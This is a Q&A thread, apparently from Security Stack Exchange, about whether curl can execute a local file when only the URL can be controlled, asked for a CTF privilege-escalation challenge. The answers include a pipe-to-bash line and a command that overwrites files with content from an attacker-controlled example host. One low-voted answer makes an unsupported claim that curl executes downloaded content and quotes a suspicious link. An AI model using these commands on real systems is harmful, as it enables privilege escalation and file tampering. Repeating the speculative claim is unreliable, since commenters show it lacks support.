5

I wonder if it is possible to execute bash code or a local file from cURL, that is, using the following syntax:

curl "local file"

I was looking for possible solutions and found that reading local files on the system can be done with "file://" as follows:

curl "file:///root/script.sh"

However, this seems to be equivalent to a "cat" or a "more", that is, it opens the file but does not execute it, so is it possible to execute bash instructions or execute the file using the previous syntax from cURL?

schroeder
Julián

4 Answers

7

Not sure if this is against the spirit of what you are asking but you can pipe the output of a shell script to bash. e.g. curl "file:///root/script.sh" | bash

Also take a look at a list of known curl vulnerabilities... I'm not aware of a good one for your purpose but if I needed to execute code with only curl I would look at its known vulnerabilities.

schroeder
DarkMatter
  • Maybe, but I wanted to know if it is possible to do it without any pipe or cURL option, i.e. using only the URL. At the beginning I was thinking of something like curl "file:///root/script.sh | bash" – Julián Nov 01 '18 at 14:51
  • no curl options allowed? – DarkMatter Nov 01 '18 at 14:52
  • No, only the url :( – Julián Nov 01 '18 at 14:54
  • 2
    @Julián I got nothing sorry :/ – DarkMatter Nov 01 '18 at 14:59
  • 8
    I feel like this is an [XY Problem](http://xyproblem.info/). Can you explain _why_ you need to do this? – Mike Ounsworth Nov 01 '18 at 15:00
  • It is a CTF challenge, what happens is that every so often curl is executed with privileges, and the only parameter that I can modify until now is the URL, therefore I can only read files, but not execute them... However, they have cleared my doubt of whether or not it could be cURL :) – Julián Nov 02 '18 at 14:12
  • @Julián does it have to be a local file? Does it have an internet connection? What version of curl? – DarkMatter Nov 02 '18 at 14:56
1

Not without exploiting a vulnerability in either cURL, one of the libraries it uses, or the terminal emulator the output is printed to. While there certainly have been vulnerabilities in the utility that allowed for arbitrary code execution, there is no supported method to execute a file just by accessing it.

forest
0

There is no way to directly execute code just by accessing a URL with curl. file:// URLs read local files, and other URL schemes access files over the network. All of those only execute code that's an intended part of curl itself (including the underlying libraries and operating system).

Technically it's possible to design filesystems that execute arbitrary code when accessing a file. Typically such a filesystem would use FUSE. However, a filesystem that allows arbitrary code execution by just reading from a file would be unusual. You can't expect to find such a thing on a typical system (and if you could set it up, you'd already have a way to execute arbitrary code).

If you can pass arbitrary arguments to a curl command line, you can pass options, i.e. arguments beginning with -. However, with curl, if you can only pass a single argument, I don't think you can do anything interesting: curl wants a URL, and if you only pass an option instead, you'll only get a boring result (e.g. curl --version) or an error. If you can pass multiple arguments, then I still can't find a way to directly execute arbitrary code, however you can overwrite arbitrary files (curl -o /some/path http://server-under-my-control.example.org/whatever), which is very damaging in itself and often leads to subsequent arbitrary code execution.

Gilles 'SO- stop being evil'
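The two risks named in the answer above (an argument that starts with `-` being parsed as an option, and `file://` reading local files) can both be closed on the calling side. The sketch below is an added example, not part of the original answer; the function names `check_url` and `fetch_untrusted`, the 10-second timeout and the sample values are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example (hypothetical helper names): hardening a script that
# runs curl on a URL it does not control.

# check_url VALUE: returns 0 only for a plain http:// or https:// URL.
check_url() {
    case "$1" in
        -*) return 1 ;;              # would be parsed by curl as an option
        *[[:space:]]*) return 1 ;;   # whitespace, e.g. 'file:///x | bash'
    esac
    case "$1" in
        http://?*|https://?*) return 0 ;;  # strict lowercase allow-list
        *) return 1 ;;                     # file://, other schemes, no scheme
    esac
}

# fetch_untrusted URL OUTFILE: OUTFILE is fixed by the caller and never
# derived from the untrusted value. Returns 2 if the URL is rejected,
# otherwise curl's own exit status.
fetch_untrusted() {
    check_url "$1" || { echo "rejected: $1" >&2; return 2; }
    # -q (first)     : do not read a .curlrc that could add options
    # --proto        : curl itself refuses anything but http/https
    # --proto-redir  : the same restriction after a redirect
    # --             : end of options, the next argument is always a URL
    curl -q --proto '=http,https' --proto-redir '=http,https' \
         --max-time 10 --silent --show-error \
         --output "$2" -- "$1"
}
```

The shell-side check and curl's own `--proto` restriction overlap on purpose, so a mistake in one is still caught by the other.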
-2

curl url > file

Does not appear to be safe. Perhaps piping filters the data through stdin in such a way that commands embedded in the data can become executed in the process, compromising your system, at least that is my experience.

The behavior seems counterintuitive. It appears to parse the incoming file and perform additional actions based on its contents by default. We are left to wonder what those actions could have been since it happens at computer speeds.

:(

Incident...

  • The following link, received in a Facebook message, was selected and the screen flashed, suggesting it attempted something. Subsequently, it became clear it is not a YouTube domain.
  • I then curled it to a file and got an HTML page loading a JavaScript.
  • I then curled the JavaScript link to a file, but in addition to the file, text of some kind began streaming on my console. I became concerned that the original curled JavaScript somehow became executed, at least in part.

Here is the link (maligned to prevent accidental invocation):

http:// youtube.9m4i.com/ Ug8TpQ9

Unfortunately, it seems the behavior has changed.

George
  • 2
    You claim it's not safe, but you don't say why. “Perhaps piping filters the data through stdin in such a way that commands embedded in the data can become executed in the process” — there's no piping involved here, at least not explicitly. Whether commands can become executed is the whole point of the question. Can they? – Gilles 'SO- stop being evil' Jul 13 '22 at 06:34
  • This isn't an answer. This is a story of when you tried to curl a file and something strange happened, but you don't know why. – schroeder Jul 13 '22 at 15:37
  • Yeah. The behavior seems counterintuitive. It appears to parse the incoming file and perform additional actions by default. It does not merely get a file but gets a file and does stuff based on its contents. – George Jul 13 '22 at 15:54
  • This is pure speculation, though. And not enough details to understand what actually happened. – schroeder Jul 13 '22 at 15:59